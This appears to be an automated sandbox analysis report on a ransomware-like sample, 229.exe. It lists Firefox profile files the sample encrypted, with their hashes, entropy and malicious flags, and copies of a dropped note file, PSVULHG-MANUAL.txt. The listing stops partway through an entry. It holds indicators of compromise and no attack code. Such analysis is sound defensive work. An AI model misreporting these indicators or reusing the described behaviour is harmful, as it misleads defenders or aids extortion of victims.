C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\extensions.json Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1581
Entropy (8bit):	7.867235688222168
Encrypted:	false
MD5:	6C66F959C1C629CF35B3B7BDD3B4D529
SHA1:	A231A59F4D2712941B250EC8BFBD763F56F1941D
SHA-256:	0C15D1D96959D5F859314649EF41EAFF028AD7DB95B11AE001108FA3E7BD75C7
SHA-512:	4DE013CE3B309ED83A31D1A409D6CCF7B0BD64698C31856F82409EBFAFAA9744418573905E18726D7BD132D62D422A650A04575CECD8AA53F3278257B4514E51
Malicious:	false

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\formhistory.sqlite Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	197148
Entropy (8bit):	7.9990950639476655
Encrypted:	true
MD5:	4C451D6EC412C03EEDAFFEF7C1541D8C
SHA1:	9E604EC8343C729EFE2418D97257BB424A1124F6
SHA-256:	BAEDD35DF0B82B4AAA68B1FF44BBF9FD4314CE5D86F0A8FADC66FC9C0B959D8A
SHA-512:	79F37CBBCCA5603C9D3FB68C9E1F12EC3680239E4EC56BCD7361CA9FB83F232D0292065BF2C5BFC771A040A45F9F7E0191DFCB4830A19C7C9529A9DC9921CA5E
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.info Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	849
Entropy (8bit):	7.684008797941194
Encrypted:	false
MD5:	6EC3E790FBAB7C29D6894D943327B6D7
SHA1:	B85B92306C485279564DD18383AEA6C0ABAAE192
SHA-256:	1F878F5AF9A932C663A5429D04F0D1688502A1AA352E09EF55C4874C49890037
SHA-512:	C26CF0B833D49F4A20AD9FE2F915FAF1158E8F5BD6660CB2CFD5D42EBC9D385091314FB9896A2BD098789E999146D8C048EA68780E305BABE30A520A3580EB7D
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.voucher Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	222574
Entropy (8bit):	7.999212806021143
Encrypted:	true
MD5:	9CA1A11D2A0D2090191683BFBCCE3A27
SHA1:	A04F199FF6A0C5E9033465AC04C582F3B38CE8C3
SHA-256:	DDC38BBF99F8597C164BBB79C9525A6B75ED4C37CDEFE9C68BCD8A43B566ACC1
SHA-512:	00F8A4B2DBD9C75F1A776E2F57091215B59C210FF057CFB1F96CC1894111435125E6445843A9A940885E5B44AC9C1237B04DCA0A898CB24DF0296163511BAD90
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\gmpopenh264.info Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	660
Entropy (8bit):	7.644943297015191
Encrypted:	false
MD5:	48439A9363BE3D0A5C0932C8354385D4
SHA1:	509D3A0C980914894503992CE0A75BEE121C7B8B
SHA-256:	AF1445BABC17B4CA7325BE80EB154D1BEA273BA074C61440612B2BDC6E1DC10F
SHA-512:	F863F4040386F1841E2C9260932A770C6691AE6874E799E87271B5296B49949EC3328EF551DEACE0B43D8C37693FA5AB48A7EE37174832D1D7B2842E6C47B3AB
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\WINNT_x86-msvc\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport.sqlite Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1049116
Entropy (8bit):	7.999823800088176
Encrypted:	true
MD5:	BA2C8E730300C853E02A2FFFA4EEDDC1
SHA1:	DFE84A22B8DD4ACB3CB676B6229412559163BFA9
SHA-256:	A02B0CAAFD6051C9CF9765211D9BC84F13AE054D367A36A70455005306B7D43F
SHA-512:	AC26304692A811FF2CAB827608C47C0C1801D375C28601BF2F1A24BD418688B2A3405FF5D63801B8C29AB9C498040B830FE604FA7C24A26E52A07946ECD06A64
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\state.json Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	733
Entropy (8bit):	7.660186711054286
Encrypted:	false
MD5:	B6446D698922BFEC8A45FA9534949DAB
SHA1:	26CB941BBB068F176DDB168FF6AC54039F1AAFC5
SHA-256:	56EB211A90049F118040A02C913879473285CFA9C1355670A5B4DAC5C9D3A69C
SHA-512:	360FCA309467BAA049FD9F929CA3FF5D1718AA8FB35CAB76AC8C18D4EEA4FE5D3FB4EEC26EB868B9FCEDA18910D1E4E0A536DAE6A3FFB406304B3BA2335C4592
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	16924
Entropy (8bit):	7.989133872458239
Encrypted:	false
MD5:	6B35ED5A627FC30E8E94E691E6B49C0C
SHA1:	54F6E3E5517E42E1DFA709B03A27A4CFD2E662E2
SHA-256:	FED7347C8F2CFD6E3FC3C3DA4C3FECC6AA7BC4AA62C6DE93F06871D867706F30
SHA-512:	9068666AD12038DC253F61054346E93DCE14556404599A1D72343AE6C96FC29A3CDC55A5984253B61855E58FEB803C6B6203D02C49606008C38AC12770E74788
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\mimeTypes.rdf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	4321
Entropy (8bit):	7.949499716570774
Encrypted:	false
MD5:	C17EA706414285FC4DCC8F50613CFC0C
SHA1:	37575CE19CEE6D5BF1614BB2C4DB1110B0B7535E
SHA-256:	E7B75CD234B79EB76BC09B55C1045645D61F5662805ED326F641D1250C76117E
SHA-512:	72166F138BF3D1E10B7A9C6E8AC6559D552BC514A8F7EA0E2B80D28DE571EA88BA2535E63780AC052BCCCC667BEDD2C7F7383F9211F23C4FFB868862AE695618
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\minidumps\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\permissions.sqlite Download File
Process:	C:\Windows\Temp\229.exe
File Type:	DOS executable (COM, 0x8C-variant)
Size (bytes):	131612
Entropy (8bit):	7.9984736329757435
Encrypted:	true
MD5:	7C2B6D310E56BC1BAB4BCDC9B841B168
SHA1:	757BDBCE2B95F50226C53DF37831B94E83B5C72B
SHA-256:	CEF5648058C88C59B1528524C38E0E07189F3B4222C207667F86656818980FDB
SHA-512:	23E5991AD1818B55BA16FFBF02B40971F9B275777212D02E8E8D56429B83F1AA30FAE3C67CE9CE4BD1B7DFEDB5E404D31D173D9959D70D17FFE134E7F993F801
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqlite Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1049116
Entropy (8bit):	7.999832623318814
Encrypted:	true
MD5:	6AB11A69F009CC62FE0135AC0F81CB58
SHA1:	6E4057EE32BCF28596A68F79A01F1D3D6BE7053B
SHA-256:	16922027D7F0F5F6D086CD4F57919D66DD5E3D3B8EC4E2702182DB5ADDF5E5F2
SHA-512:	1B6E19A63A77B3BF1BA85215702B089C699A95F08381B6928DC4FF20D8E6BE61054C1A5302AC7A965FAD583D71C2C0E2D4639BC231841E0FA5BBB59D737773E0
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\pluginreg.dat Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	5037
Entropy (8bit):	7.957322847798621
Encrypted:	false
MD5:	6DF047C7072153EB3BD838A2323B8CBB
SHA1:	A01802B36C11C4C9C5DEEE347E21D64296D5EF71
SHA-256:	924875CEF2D4AE85ED1A4CFDE1FFA41023B43A8CF34E7013112649167C87F21A
SHA-512:	9FB2435539257C82CD45386EBB1A539C5462CF388D1DDB2DFDC6CBE5B0C39935306EAAEBF2F06FB806B49A4DB63DDF125D34D5FB69A5E3CC31E9F251BC1236C6
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	7274
Entropy (8bit):	7.971464575133567
Encrypted:	false
MD5:	FE512480EDA3787750BBE5DC7B3E946B
SHA1:	47B2A90AD42A631DA698CBD3CB36D03A4BFB9907
SHA-256:	A120C142E0AF80432F9093FAA8E504BA26B801C25914D1DC82E08FB098DBE45B
SHA-512:	37F781A79AA242C951124ACFF975B0DE7E71EC231C07F8597803C03DF9DA38B0258CFEC6A4759CF76EAA7AED1C4587C45526F6FF68961BC5A0456BF9F49129F4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1736
Entropy (8bit):	7.880968948453796
Encrypted:	false
MD5:	243C7E7E972033939753346ED934E557
SHA1:	CE1345DB41A4B471F5B50EB4EABD31B9859E7BAF
SHA-256:	E543B98120BE1106C483713E800BAD967F8668A8BB07C08A85DE77EC77ACE36F
SHA-512:	513583290722E35841BE6F80E0EE051590398FF85427300F0F5ACA3CB1CA40BC16DE538BE917B8F061D3DD5F53721D331C51D2017D5B076A4CB1B50D59CB8B2B
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	12547
Entropy (8bit):	7.98520268976701
Encrypted:	false
MD5:	848082D440946CF7CA67F51E447EB136
SHA1:	9401193AB5007F79D2D646EF51CD50D492FFDA51
SHA-256:	3F075909AFEA5FCF827D55336D9E1B2A152E0DDFBB980477520854FAD9B0AF5A
SHA-512:	934E1D17FBEE5DAFBB723012A0C017EBE8BD31A351D103E6576403E6309AA4582208ECA1D204A6EFA5E0162679B1A3043E5963177D8F59CD68B99CEE4688A766
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\0675a2f8-c025-4cb1-98bc-4a943648cf69 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	12233
Entropy (8bit):	7.985646173777284
Encrypted:	false
MD5:	80EE531899B0383202A5D50A9ED2245F
SHA1:	AFF0E15BED479F3EC7F73492799DFC7587D92F6B
SHA-256:	336A63C706D6D53AFAD0FF18A9159CD9045005DE3A19338084447574D45F27BA
SHA-512:	E42FFD18FA4A28184A74375163200BF364011A2702E7EDDBCA49A4D5509EA087FD5B5E97E6BF10D5227E488059019B88FD7FD64213824750B7B778669D69F26A
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\804b5b8e-3057-4315-ada7-6389f240c010 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	12636
Entropy (8bit):	7.985612035119671
Encrypted:	false
MD5:	D3274AF0DF22EE5BCF03CB85445D5870
SHA1:	A70DE90F1FF0FA20FC42B19B9F295FF4AF409F56
SHA-256:	B3179792C376740FD2CF9B875551043D3B258786349FDFA60CCD2D9961B5BA6C
SHA-512:	EFB3BA228FCBD1BF914D3A1DBE6E247F8FBC4774E54E7C5DC538269619B6E8C01E36E729944E308089AF48FBD2E9891412E5A3E830750D11236F24E6A79090EA
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search-metadata.json Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	835
Entropy (8bit):	7.757094734544656
Encrypted:	false
MD5:	031CFA952AAD1AC345EBBA0CE80721FD
SHA1:	1F530F23F393A59A37BA27459EB60F1B83310F9F
SHA-256:	B74A313570FFCAB642E2E365A7D2B82AFA399A985A87F2299EEB7AB82006E66F
SHA-512:	E979D8FB3AE228C8E56BE9D343716A4658EF859C1FC04E3B4ED8E4478161027FDB4B338A5DDE3F78F3ACCC53A1F48511529CC1C1DCA3BAF39A1A0D54BA37BDFA
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search.json Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	145253
Entropy (8bit):	7.998790739428193
Encrypted:	true
MD5:	75267AF6FEA6F25DA00EB594E451B817
SHA1:	EA11F23DE9000639F02EC483836CA1B78B9BFB0B
SHA-256:	B63FBEF692D509770007DAA970FFD63E7AB9B758A3C7B9F68E49A26CBA59CC41
SHA-512:	96CA310591139671F1DEF13C5BF87ECF67432AA2A5566C2F20A4C432E3FAA1702CA168A8102460F7CEAC675008B8A794E95D9FECFD5102E03FC5F8E7F5CE5CB5
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	16924
Entropy (8bit):	7.9885338312645136
Encrypted:	false
MD5:	EDD3204AC47B88912F6D285BF42BAC5D
SHA1:	FD934CB0E0B1FDE595A88DF8BB5AA43CD4D60EAA
SHA-256:	AD17D6E8A77C787487FB08B0B42FCA8481F0E46709FFD10597157BCE1DE58EDF
SHA-512:	DBE08A3636616BCA537BDAA4F718AC2DFE60260F620872E247DBC4CB10B2135AC39E0E4308396358C4C7E3CB71F90E8673EFD5DA4F96BB6493F16295D84A59CA
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionCheckpoints.json Download File
Process:	C:\Windows\Temp\229.exe
File Type:	COM executable for DOS
Size (bytes):	828
Entropy (8bit):	7.669392920805415
Encrypted:	false
MD5:	31B1748F3579B9FF9FB303A7CEE32EE9
SHA1:	6F54EF38D1D30B92E06FDBF45198EDAD4724F809
SHA-256:	516009F5CC10CB71C36D4DC4EDB56AFBFBC3FAA577B8E419657D2A72A1EAF383
SHA-512:	ECF39800D7A52511D1712AFCB298D89AF0061D6EC0E2694BAF45D1E710D94FE2FA2A2B137B736794F8DE7E0A4569EA522133B54CD15C75BC81DBAD40C8AF02FA
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	3161
Entropy (8bit):	7.930720879744835
Encrypted:	false
MD5:	276AE7302055D1EA4F727E08341C7767
SHA1:	43549045E84E22267856C9A61D9F845CE4B2EB27
SHA-256:	4CF248CB0DD525A9E34BBFA923B65C184FDED86378DBB517B2C153BF05D30EC4
SHA-512:	54F9A0280B91BDE69CFD9D86BA2F83FB71F14A27D0A089D1B2973EF7955DFC59C90A04FA8683E23E6A650E35AF5630FBD1E0E8B17D5ABFE50ACA06A52304F272
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\upgrade.js-20150305021524 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1375
Entropy (8bit):	7.852452633442228
Encrypted:	false
MD5:	E3C67EAD7E8E534AB4CFC2CB0787A87B
SHA1:	F4B0B893412313EB856DBC7C3F09A787F03C98F4
SHA-256:	2D35FD392BD1CEF22F7E120224D7551620BC83BD687A001D42ACFF161B7A93A6
SHA-512:	29C17DA03CACE6BDF3CBA333C7EB2FBF0C67E6465BA6F04BF9A92FD66CA4221B6C73F2CF5EC6D3AE03BAC965E0A51863EAC1B94C212677B87EC371DA5BB824DA
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\upgrade.js-20151216175450 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1748
Entropy (8bit):	7.88448123617792
Encrypted:	false
MD5:	C3D902C8C60A6EDF9AAD4671652129C4
SHA1:	F46D570BF2875C64B700C82F1A96EC1D56506D5E
SHA-256:	6FCDA1F38BA846014AB215BA9D742CB932D045E7E76BD69AAF867C4996DB083B
SHA-512:	B4B3FD97DDF1D4A4141E40284A0D41E132820CD69032A2918050DA2760688F7D78CDEDC507A30C89C9442079C9CD68564B4CDD01122626D4598206A798BC55AC
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\.metadata Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	569
Entropy (8bit):	7.581516325188922
Encrypted:	false
MD5:	426ADDE1FD0B4A3EB593FA165838DFFC
SHA1:	A70827044AE8FEB1D4FE2957856829E376BDB3B2
SHA-256:	42F3ED2DB65E4BF558208F261B480DC0A92A84DD9E2E7F47775C12659BD5A0D4
SHA-512:	DA04443661A234F5A6FAE3029F854D536FB584E24B21DF2745C0AFC1C6D167F480CD0AA86B940C8670DC498471B98B817CF06F829B1D69161A62D7964003BAA4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.files\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	49692
Entropy (8bit):	7.996312144112978
Encrypted:	true
MD5:	EFE01ED4DA40AC2C3D3CCBD43D75179F
SHA1:	B05A2C3F4AB18EE1F49A84DC49D1917D4D393C99
SHA-256:	05F4C08FCAA36AF8FB4ECA9AA11F633BCADA96AB0FC567F9FA3B6B6218BD71C3
SHA-512:	37BA4CB90AF2564726EAD166C5EEC0A7B2B88500FA854B934CAEFFFDDC6214318EBCC72195E3B1327A38D5DA8BD3004949285E3955FECAF2BC2707C837C55553
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\.metadata Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	586
Entropy (8bit):	7.588379252010721
Encrypted:	false
MD5:	4145EB0D56D043B4CBA9771BE98C47D6
SHA1:	588A85AC67C2ACEF9DCBAFEB35C265E627BA11E6
SHA-256:	6255152D1EE7A6456B6826D6B575EE9D8E6D94C8C5D6EC8A0A02A42341D4E034
